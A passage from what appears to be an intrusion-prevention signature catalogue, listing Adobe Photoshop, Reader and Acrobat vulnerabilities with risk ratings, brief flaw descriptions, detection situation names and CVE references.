Description: A heap buffer overflow vulnerability has been discovered in Adobe Photoshop's handling of specially crafted TIFF files. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted TIFF file with the affected application. Successful exploitation could result in arbitrary code execution in the context of the target user.
Situation: File-Binary_Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow
References:
CVE-2012-2027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2027
BID-52634
http://www.securityfocus.com/bid/52634
Back to top

Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Adobe Photoshop
Risk: High
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Photoshop; Adobe Photoshop Elements
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the Adobe products. The vulnerability is due to improper boundary validation when processing PNG images. The flaw can be leveraged remotely to execute arbitrary code under the context of the currently logged in user.
Situation: HTTP_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
File-PNG_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
References:
CVE-2007-2365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2365
BID-23698
http://www.securityfocus.com/bid/23698
OSVDB-38063
http://www.osvdb.org/38063
OSVDB-35465
http://www.osvdb.org/35465
Back to top

Adobe-Reader-ActiveX-Vulnerable-Function-Call

About this vulnerability: Vulnerable ActiveX function call against Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Reader
Type: Insecure Configuration
Description: A vulnerability exists in Adobe Reader 7.0.8 when calling certain ActiveX functions.
References:
CVE-2006-6236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6236
BID-21813
http://www.securityfocus.com/bid/21813
OSVDB-31058
http://www.osvdb.org/31058
Back to top

Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-361-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in Adobe Acrobat and Reader products. The vulnerability is due to a boundary checks error while parsing crafted PDF documents. Remote attackers can exploit this vulnerability by enticing target users to open a malicious PDF document in a vulnerable version of the affected applications. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware
File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware
File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware-2
References:
CVE-2010-0188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188
BID-38195
http://www.securityfocus.com/bid/38195
Back to top

Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Adobe Reader and Acrobat.
Situation: HTTP_SS-Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
File-PDF_Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
References:
CVE-2008-2992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992
BID-30035
http://www.securityfocus.com/bid/30035
OSVDB-49520
http://www.osvdb.org/49520
Back to top

Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Adobe Reader and Adobe Acrobat. The vulnerability is due to a failure to validate user input when processing RLE encoded BMP images in XFA. The vulnerability can be exploited by a remote attacker by enticing a user to load a malicious file with the vulnerable product. Successful exploitation would lead to execution of arbitrary attacker code in the security context of the target user.
Situation: HTTP_SHS-Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-BOF
File-PDF_Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow
References:
CVE-2013-2729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729
BID-59918
http://www.securityfocus.com/bid/59918
OSVDB-93358
http://www.osvdb.org/93358
Back to top

Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader; Adobe Acrobat
Type: Malfunction
Description: A code execution vulnerability exists in Adobe Reader and Acrobat which can allow an attacker to take control of a target system. The vulnerability is due to memory corruption while handling RMA objects in Javascript. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted document. A successful attack could result in the execution of arbitrary code in the security context of the target user. In an attack case where code injection is not successful, the affected Adobe application parsing the malicious PDF document can terminate abnormally.
Situation: File-PDF_Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption
References:
CVE-2012-4157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4157
OSVDB-84629
http://www.osvdb.org/84629
Back to top

Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A sandbox bypass vulnerability exists in Adobe Reader and Acrobat. This vulnerability can allow an attacker to access privileged Javascript functions, bypassing sandbox restrictions. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted PDF document. A successful attack could result in the execution of arbitrary Javascript code in the security context of the target user.
Situation: File-PDF_Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass
References:
CVE-2014-0521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0521
BID-67363
http://www.securityfocus.com/bid/67363
OSVDB-106905
http://www.osvdb.org/106905
Back to top

Adobe-Reader-BMP-Vulnerability-2011-2438a

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Reader
Type: Malfunction
Description: A vulnerability in Adobe Reader
Situation: HTTP_SS-Adobe-Reader-BMP-Multiple-Vulnerabilities
File-PDF_Adobe-Reader-BMP-Multiple-Vulnerabilities
File-Binary_Adobe-Reader-BMP-Multiple-Vulnerabilities
References:
CVE-2011-2438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2438
Back to top

Adobe-Reader-BMP-Vulnerability-2011-2438c

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Reader
Type: Malfunction
Description: A vulnerability in Adobe Reader
Situation: HTTP_SS-Adobe-Reader-BMP-Vulnerability-2011-2438c
File-PDF_Adobe-Reader-BMP-Vulnerability-2011-2438c
File-Binary_Adobe-Reader-BMP-Vulnerability-2011-2438c
References:
CVE-2011-2438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2438
Back to top

Adobe-Reader-BMP-Vulnerability-2011-4372

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Reader
Type: Malfunction
Description: A vulnerability in Adobe Reader
Situation: HTTP_SS-Adobe-Reader-BMP-Multiple-Vulnerabilities
File-PDF_Adobe-Reader-BMP-Multiple-Vulnerabilities
File-Binary_Adobe-Reader-BMP-Multiple-Vulnerabilities
References:
CVE-2011-4372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4372
BID-51349
http://www.securityfocus.com/bid/51349
Back to top

Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2049

About this vulnerability: An attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2050
References:
CVE-2012-2050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2050
Back to top

Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-551-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353
References:
CVE-2013-3353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3353
Back to top

Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-551-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354
References:
CVE-2013-3354
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3354
Back to top

Adobe-Reader-Crash-CVE-2015-3056

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A vulnerability exists in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Crash-CVE-2015-3056
References:
CVE-2015-3056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3056
Back to top

Adobe-Reader-Heap-Overflow-CVE-2017-3055

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a heap overflow vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Heap-Overflow-CVE-2017-3055
References:
CVE-2017-3055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3055
Back to top

Adobe-Reader-Heap-Overflow-Vulnerability

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There is a vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability
References:
CVE-2012-1525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1525
Back to top

Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604

About this vulnerability: Malicious PDF file detected
Risk: Moderate
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Input Validation
Description: There is a heap overflow vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0604
References:
CVE-2013-0604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0604
Back to top

Adobe-Reader-Heap-Overflow-Vulnerability-CVE-2013-0621

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: Adobe Reader
Type: Buffer Overflow
Description: A possibly malicious PDF file, which may exploit ad vulnerability in Adobe Reader, was detected
References:
CVE-2013-0621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0621
Back to top

Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Buffer Overflow
Description: A vulnerability in Adobe Reader
Situation: HTTP_SS-Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
File-PDF_Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
References:
CVE-2011-2436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2436
Back to top

Adobe-Reader-Information-Disclosure-CVE-2017-3031

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists an information disclosure vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Information-Disclosure-CVE-2017-3031
References:
CVE-2017-3031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3031
Back to top

Adobe-Reader-Integer-Overflow-CVE-2010-2862

About this vulnerability: An integer overflow vulnerability in Adobe Reader
Risk: Critical
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Adobe Reader
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Adobe Reader.
Situation: E-Mail_BS-Adobe-Reader-Integer-Overflow-CVE-2010-2862
HTTP_SS-Adobe-Reader-Integer-Overflow-CVE-2010-2862
File-PDF_Adobe-Reader-Integer-Overflow-CVE-2010-2862
References:
CVE-2010-2862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2862
Back to top

Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371

About this vulnerability: Detected an attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: Detected an attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-JavaScript-Heap-Corruption-CVE-2011-4371
References:
CVE-2011-4371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4371
BID-51351
http://www.securityfocus.com/bid/51351
Back to top

Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373

About this vulnerability: Detected an attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: Detected an attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-JavaScript-Memory-Corruption-CVE-2011-4373
References:
CVE-2011-4373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4373
BID-51350
http://www.securityfocus.com/bid/51350
Back to top

Adobe-Reader-JavaScript-Spell.customDictionaryOpen-Method-Memory-Corruption

About this vulnerability: A buffer overflow vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Adobe Reader and Acrobat on Linux/Unix platform. The vulnerability is due to insufficient input validation in the implementation of the customDictionaryOpen JavaScript method. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious PDF file. In an attack case where code injection is not successful, the affected Acrobat application parsing the malicious PDF document can terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.
Situation: HTTP_SS-Adobe-Acrobat-CustomDictionaryOpen-BOF
File-PDF_Adobe-Acrobat-CustomDictionaryOpen-BOF
References:
CVE-2009-1493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493
BID-34740
http://www.securityfocus.com/bid/34740
OSVDB-54129
http://www.osvdb.org/54129
Back to top

Adobe-Reader-JavaScript-Vulnerability-2011-2442

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Reader
Type: Malfunction
Description: A vulnerability in Adobe Reader
Situation: HTTP_SS-Adobe-Reader-JavaScript-Vulnerability-2011-2442
File-PDF_Adobe-Reader-JavaScript-Vulnerability-2011-2442
References:
CVE-2011-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2442
Back to top

Adobe-Reader-JPEG-Multiple-App0-Markers

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Buffer Overflow
Description: A vulnerability in Adobe Reader
Situation: HTTP_SS-Adobe-Reader-JPEG-Multiple-App0-Markers
File-PDF_Adobe-Reader-JPEG-Multiple-App0-Markers
References:
CVE-2011-2440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2440
Back to top

Adobe-Reader-Memory-Corruption-CVE-2017-3019

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a memory corruption vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3019
References:
CVE-2017-3019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3019
Back to top

Adobe-Reader-Memory-Corruption-CVE-2017-3025

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a memory corruption vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3025
References:
CVE-2017-3025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3025
Back to top

Adobe-Reader-Memory-Corruption-CVE-2017-3030

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a memory corruption vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3030
References:
CVE-2017-3030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3030
Back to top

Adobe-Reader-Memory-Corruption-CVE-2017-3036

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a memory corruption vulnerability in Adobe Reader. A remote attacker could use this to execute arbitrary code on the affected system.
Situation: File-Binary_Adobe-Reader-Memory-Corruption-CVE-2017-3036
References:
CVE-2017-3036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3036
Back to top

Adobe-Reader-Memory-Corruption-CVE-2017-3050

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a memory corruption vulnerability in Adobe Reader.
Situation: File-GIF_Adobe-Reader-Memory-Corruption-CVE-2017-3050
References:
CVE-2017-3050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3050
Back to top

Adobe-Reader-Memory-Corruption-CVE-2017-3056

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a memory corruption vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Memory-Corruption-CVE-2017-3056
References:
CVE-2017-3056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3056
Back to top

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147

About this vulnerability: An attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4147
References:
CVE-2012-4147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4147
Back to top

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There is a vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4148
References:
CVE-2012-4148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4148
Back to top

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150

About this vulnerability: An attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4150
References:
CVE-2012-4150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4150
Back to top

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151

About this vulnerability: An attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4151
References:
CVE-2012-4151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4151
Back to top

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152

About this vulnerability: An attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4152
References:
CVE-2012-4152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4152
Back to top

Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There is a vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Memory-Corruption-Vulnerability-CVE-2012-4153
References:
CVE-2012-4153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4153
Back to top

Adobe-Reader-OpenTextFile-Buffer-Overflow

About this vulnerability: An Adobe Reader OpenTextFile Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-802-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: Adobe Reader
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Adobe Reader, versions 9.3.3 and before, which allows remote attackers to have users execute arbitrary programs specified in a PDF document through the OpenTextFile function.
Situation: File-PDF_Adobe-Reader-OpenTextFile-Buffer-Overflow
References:
CVE-2010-1240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1240
OSVDB-63667
http://www.osvdb.org/63667
Back to top

Adobe-Reader-Pcx-Height-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Buffer Overflow
Description: A vulnerability in Adobe Reader
Situation: HTTP_SS-Adobe-Reader-Pcx-Height-Integer-Overflow
File-PDF_Adobe-Reader-Pcx-Height-Integer-Overflow
References:
CVE-2011-2437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2437
Back to top

Adobe-Reader-Pict-Header-Packet-Overflow

About this vulnerability: A vulnerability in Adobe Reader
Risk: High
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Buffer Overflow
Description: A vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Pict-Header-Packet-Overflow
References:
CVE-2011-2435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2435
Back to top

Adobe-Reader-Player-CVE-2017-2966

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a heap buffer overflow vulnerability in the ImageConversion component of Adobe Acrobat. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Adobe-Reader-CVE-2017-2966
References:
CVE-2017-2966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2966
Back to top

Adobe-Reader-Printseps-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Reader
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A memory corruption vulnerability exists in Adobe Acrobat and Reader products. The vulnerability is due to a design error error when parsing PDF files containing a JavaScript call to the Doc.printSeps method. Remote attackers could exploit this vulnerability by enticing target users to open the malicious PDF document in a vulnerable version of Adobe Reader. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. If code execution is failed, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Adobe-Reader-Printseps-Memory-Corruption
File-PDF_Adobe-Reader-Printseps-Memory-Corruption
References:
CVE-2010-4091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4091
BID-44638
http://www.securityfocus.com/bid/44638
OSVDB-69005
http://www.osvdb.org/69005
Back to top

Adobe-Reader-Security-Bypass-CVE-2013-0624

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader; Adobe Acrobat
Type: Malfunction
Description: There is a security bypass vulnerability in Adobe Acrobat and Adobe Reader.
Situation: File-OLE_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Flash_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Binary_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Text_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-PNG_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-GIF_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-RTF_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-RIFF_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-TextId_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-MPEG_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Zip_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Exe_Adobe-Reader-Security-Bypass-CVE-2013-0624
References:
CVE-2013-0624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0624
Back to top

Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622

About this vulnerability: A security bypass vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Input Validation
Description: There is a security bypass vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Security-Bypass-Vulnerability-CVE-2013-0622
References:
CVE-2013-0622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0622
Back to top

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049

About this vulnerability: An attempt to exploit a vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Reader
Situation: File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-2049
References:
CVE-2012-2049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2049
Back to top

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149

About this vulnerability: Malicious PDF file detected
Risk: Moderate
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Input Validation
Description: A malicious PDF file was detected
Situation: File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4149
References:
CVE-2012-4149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4149
Back to top

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155

About this vulnerability: Malicious PDF file detected
Risk: Moderate
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Input Validation
